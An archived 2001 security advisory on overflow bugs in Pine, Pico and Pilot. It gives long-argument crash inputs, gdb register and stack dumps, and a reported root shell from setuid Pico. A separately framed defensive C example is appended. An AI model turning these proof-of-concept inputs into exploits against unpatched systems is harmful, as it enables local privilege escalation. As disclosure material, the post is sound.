Pine, Pico, Pilot Program Overflow bug

While investigating the Pine program I found overflow vulnerabilities of a similar kind in several versions.

What is PINE?

Pine (Program for Internet News & Email) is a Unix mail program (Mail User Agent) developed at the University of Washington, with powerful functions and many configuration options. Pine ships with Pico, the message composition editor, which is well liked as a text editor, and Pilot, which is used as a file browser.

For further information, visit the Pine Information Center at
URL: http://www.washington.edu/pine/
Download URL: ftp://ftp.cac.washington.edu/pine/

Vulnerabilities found:

- Pico frame pointer overflow:
--------------------------------------------------|
URL: http://my.dreamwiz.com/hackingm/lecture/pico.txt

The Pico version I tested is 3.5. The overflow no longer occurs from pico 3.8 on.
Once the editor comes up, save the file under a different file name (a long one).
I tested only on the two Linux 6.x servers that I use. The pico version on both servers was 3.5, and with the setuid bit set, both gave a root shell.
Reference test URL: http://my.dreamwiz.com/hackingm/test.txt
---------------------------------------------------------------------------------|

I found a vulnerability very similar to the attack above, triggered in an equally absurd way, in Pilot and Pine. I obtained the current release, as a binary, through the ftp download service.
Download URL: ftp://ftp.cac.washington.edu/pine/unix-bin/

0x01. Pilot Program bug testing:

[x82@testsub /tmp]$ ls -al pilot-bin.linux
-rwxr-xr-x   1 x82      x82        493976 Nov 28 18:31 pilot-bin.linux
[x82@testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x616'`
[ File name too long: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
[x82@testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x617'`
Segmentation fault
[x82@testsub /tmp]$ whereis pilot
pilot: /usr/bin/pilot /usr/man/man1/pilot.1
[x82@testsub /tmp]$
[x82@testsub /tmp]$ gdb -q /usr/bin/pilot
(no debugging symbols found)...(gdb) set args `perl -e 'print "x"x237'`
(gdb) r
[ File not found: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ]
(no debugging symbols found)...
Starting program: /usr/bin/pilot `perl -e 'print "x"x237'`

Program received signal SIGSEGV, Segmentation fault.
0x40057272 in ?? ()
(gdb) info reg
eax            0xffffff26       -218
ecx            0x0              0
edx            0x40144c60       1075072096
ebx            0x78787878       2021161080
esp            0xbffff808       0xbffff808
ebp            0x4              0x4
esi            0x78787878       2021161080
edi            0x78787878       2021161080
eip            0x40057272       0x40057272
eflags         0x10246          66118
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0
(gdb)

For reference, all of this is the same UW PILOT 2.0 version.

0xbffff4e0:     0x3a646e75      0x78782220      0x78787878      0x78787878
~~~ ... ~~~
                0x78787878      0x78787878      0x78787878      0x78787878
0xbffff5d0:     0x22787878      0xbffff800      0x0804a089      0xbffff8e8
(gdb) x $esp
0xbffff804:     0x40057270
(gdb)

(ebp) 0xbffff800 + 0x00000004 = 0xbffff804 (esp)
0xbffff804 -------------> 0x40057270 (eip)

That is, the saved frame pointer on the stack decides where the return address is popped from, and the word found there ends up in eip.

0x02. Pine Program bug testing:

Happily, the bug does not occur in the new version, PINE 4.42. The following is from PINE 4.10, which I am using.

[x82@testsub /tmp]$ whereis pine
pine: /usr/bin/pine /usr/man/man1/pine.1
[x82@testsub /tmp]$ pine `perl -e 'print "x"x50000'`
Segmentation fault
[x82@testsub /tmp]$

Let's test another version. The following was tested on PINE 4.30.

bash$ gdb -q pine
(no debugging symbols found)...(gdb) set args `perl -e 'print "x"x50000'`
(gdb) r
Starting program: /usr/bin/pine `perl -e 'print "x"x50000'`
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x40295c99 in chunk_free (ar_ptr=0x40336f60, p=0x83488c0) at malloc.c:3121
3121    malloc.c: No such file or directory.
(gdb)

Here too you can see that it segfaults. I am in a hurry and have no time to look further; I could not test versions after 4.30. I hope other people will. :-D

Author: Xpl017Elz
E-mail: szoahcat_private & xploitat_private
Home: http://x82.i21c.net

P.S: As always ... sorry, I have given up on writing proper English. I will study English for next time, so that other people can understand. Thank you for reading my clumsy writing. ^-^*
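The defensive side of the argument handling above, as an added C example that is not code from Pine, Pico or Pilot (the post does not state their buffer sizes, so NAME_MAX_LEN and MSG_LEN are constructed values): the unsafe copy-then-check pattern the crashes point to, beside a version that bounds both the file-name copy and the status line that reports the rejection.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sizes; the post does not state pilot's or pico's buffer sizes. */
#define NAME_MAX_LEN 255   /* longest file name accepted, excluding the NUL */
#define MSG_LEN      80    /* one status line on an 80-column screen */

enum name_status { NAME_OK = 0, NAME_TOO_LONG = -1, NAME_EMPTY = -2 };

/* Unsafe pattern consistent with the crashes above: argv[1] is copied into
 * a fixed buffer before, or instead of, being length-checked:
 *     char fname[NAME_MAX_LEN + 1]; strcpy(fname, argv[1]);  // overflows
 * Hardened: search for the NUL only within dstsz bytes, refuse a name that
 * cannot fit together with its terminator, and copy only after that. */
enum name_status set_filename(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);  /* never reads past dstsz */
    if (end == NULL)                             /* no NUL in range: too big */
        return NAME_TOO_LONG;
    if (end == src)
        return NAME_EMPTY;
    memcpy(dst, src, (size_t)(end - src) + 1);   /* length plus the NUL */
    return NAME_OK;
}

/* The diagnostic path needs the same bound: building
 * "[ File name too long: "<name>" ]" with sprintf in a fixed buffer would
 * overflow on exactly the input being rejected. snprintf truncates and
 * always terminates; the return value is the number of bytes stored. */
int format_status(char *msg, size_t msgsz, const char *what, const char *name)
{
    int n = snprintf(msg, msgsz, "[ %s: \"%s\" ]", what, name);
    if (n < 0) { msg[0] = '\0'; return 0; }     /* encoding error: empty line */
    return (size_t)n < msgsz ? n : (int)(msgsz - 1);
}

int main(void)
{
    char name[NAME_MAX_LEN + 1], msg[MSG_LEN], arg[618];
    memset(arg, 'x', 617);                       /* the 617-'x' argument above */
    arg[617] = '\0';
    enum name_status st = set_filename(name, sizeof name, arg);
    format_status(msg, sizeof msg, st == NAME_OK ? "Opened" : "File name too long", arg);
    puts(msg);                                   /* truncated line, no overflow */
    return st == NAME_OK ? 0 : 1;
}
```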
This archive was generated by hypermail 2b30 : Wed Nov 28 2001 - 09:27:00 PST